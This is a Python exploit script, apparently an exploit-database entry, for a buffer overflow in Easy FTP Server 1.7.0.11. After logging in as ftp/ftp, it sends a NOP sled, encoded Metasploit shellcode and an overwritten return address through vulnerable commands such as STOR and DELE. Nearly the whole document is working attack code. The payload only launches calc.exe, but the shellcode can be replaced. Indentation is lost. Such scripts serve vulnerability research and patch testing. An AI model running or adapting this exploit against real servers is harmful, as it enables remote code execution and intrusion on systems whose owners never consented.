# Exploit Title: Easy FTP Server v1.7.0.11 Multiple Command Buffer Overflow
# Date: August 12, 2010
# Author: Glafkos Charalambous
# Software Link: http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip
# Version: 1.7.0.11
# Tested on: Windows XP SP3 En
# Vulnerable Commands: DELE, STOR, RNFR, RMD, XRMD
import socket
import sys
if len(sys.argv) != 4:
print "Usage: ./easyftp.py <Target IP> <Port> <Command>"
print "Vulnerable Commands: DELE, STOR, RNFR, RMD, XRMD"
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]
buffersize = 268
# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
shellcode = ("\xd9\xec\xba\x4c\x61\x82\xbc\xd9\x74\x24\xf4\x33\xc9\xb1\x33"
"\x58\x31\x50\x17\x83\xe8\xfc\x03\x1c\x72\x60\x49\x60\x9c\xed"
"\xb2\x98\x5d\x8e\x3b\x7d\x6c\x9c\x58\xf6\xdd\x10\x2a\x5a\xee"
"\xdb\x7e\x4e\x65\xa9\x56\x61\xce\x04\x81\x4c\xcf\xa8\x0d\x02"
"\x13\xaa\xf1\x58\x40\x0c\xcb\x93\x95\x4d\x0c\xc9\x56\x1f\xc5"
"\x86\xc5\xb0\x62\xda\xd5\xb1\xa4\x51\x65\xca\xc1\xa5\x12\x60"
"\xcb\xf5\x8b\xff\x83\xed\xa0\x58\x34\x0c\x64\xbb\x08\x47\x01"
"\x08\xfa\x56\xc3\x40\x03\x69\x2b\x0e\x3a\x46\xa6\x4e\x7a\x60"
"\x59\x25\x70\x93\xe4\x3e\x43\xee\x32\xca\x56\x48\xb0\x6c\xb3"
"\x69\x15\xea\x30\x65\xd2\x78\x1e\x69\xe5\xad\x14\x95\x6e\x50"
"\xfb\x1c\x34\x77\xdf\x45\xee\x16\x46\x23\x41\x26\x98\x8b\x3e"
"\x82\xd2\x39\x2a\xb4\xb8\x57\xad\x34\xc7\x1e\xad\x46\xc8\x30"
"\xc6\x77\x43\xdf\x91\x87\x86\xa4\x6e\xc2\x8b\x8c\xe6\x8b\x59"
"\x8d\x6a\x2c\xb4\xd1\x92\xaf\x3d\xa9\x60\xaf\x37\xac\x2d\x77"
"\xab\xdc\x3e\x12\xcb\x73\x3e\x37\xa8\x12\xac\xdb\x01\xb1\x54"
"\x79\x5e")
eip = "\x91\xC8\x41\x7E"
nopsled = "\x90" * 16
junk = "\x90" * (buffersize-(len(nopsled)+len(shellcode)))
payload = nopsled+shellcode+junk+eip
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect = s.connect((target, port))
print "[+] Connected"
except:
print "[!] Connection Failed"
sys.exit(0)
s.recv(1024)
s.send('User ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
print "[+] Sending payload..."
s.send(command +' '+payload+'\r\n')
s.close()